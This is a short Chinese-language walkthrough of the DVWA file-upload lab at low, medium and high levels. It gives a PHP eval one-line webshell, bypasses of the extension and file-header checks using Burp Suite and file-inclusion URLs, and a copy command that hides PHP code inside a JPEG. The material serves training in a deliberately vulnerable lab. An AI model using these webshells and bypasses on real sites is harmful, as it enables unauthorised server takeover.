实验环境:dvwa
LOW:
这个级别对文件没有做任何的限制,所以可以直接上传xxx.php文件,并取得路径。
接下来,上传个一句话木马试试:可以配合菜刀使用
一句话木马小马格式:
PHP: <?php @eval( $_POST['cmd']);?>
直接上传hack.php文件。内容如下:<?php phpinfo();?>
MEDIUM:
这个级别限制了文件类型必须是 jpg、png格式,文件大小也被限制为了 <100000kb ,
直接上传php文件,会给出提示:
绕过的方法还是有很多的,
1.抓包修改请求,先将hack2.php文件修改为hack2.png,用burpsuite将后缀名再修改为hack2.php.
2.上传hack2.png文件,成功拿到路径,但是这个png文件无法被直接使用,因为没有php解析成php文件。
但可以利用文件包含的方法来获取webshell,地址如下:http://192.168.189.131/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.189.131/dvwa/hackable/uploads/hack2.png
HIGH
这个级别要求文件名后缀为.jpg、.png和.jpeg,同样限制了文件大小,还检查了文件头是否为图片类型。
这个和中级别的第二种方法有点类似,同样利用文件包含来获取webshell,只不过上传的是图片木马
图片木马制作方法:
cmd中运行copy 1.jpg/b +hack2.php/a hack.jpg命令。可以看到代码被放到了文件的最后面
接下来就是中级别的第二种方法的操作了。
然后不要忘记这个级别同样限制了问价的大小,不然会报下面这个错误
最后成功拿到webshell。